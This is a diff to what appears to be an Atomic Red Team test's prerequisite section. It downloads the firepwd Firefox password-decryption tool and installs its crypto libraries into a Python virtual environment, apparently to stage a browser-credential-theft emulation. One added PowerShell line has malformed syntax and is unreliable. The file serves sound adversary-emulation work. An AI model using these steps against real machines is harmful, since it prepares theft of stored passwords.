 Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
 ```
-##### Description: Pip must be installed.
+##### Description: Computer must have venv configured at #{venv_path}
 ##### Check Prereq Commands:
 ```powershell
-$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-if (pip -v) {exit 0} else {exit 1}
+if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+py -m venv "#{venv_path}"
+```
+##### Description: Firepwd must exist at #{Firepwd_Path}
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
 ```
 ##### Description: Pycryptodome library must be installed
 ##### Check Prereq Commands:
 ```powershell
-$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-if (pip show pycryptodome) {exit 0} else {exit 1}
+if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
+if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
 ```
 ##### Description: Pyasn1 library must be installed
 ##### Check Prereq Commands:
 ```powershell
-$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-if (pip show pyasn1) {exit 0} else {exit 1}
+if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
+if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
 ```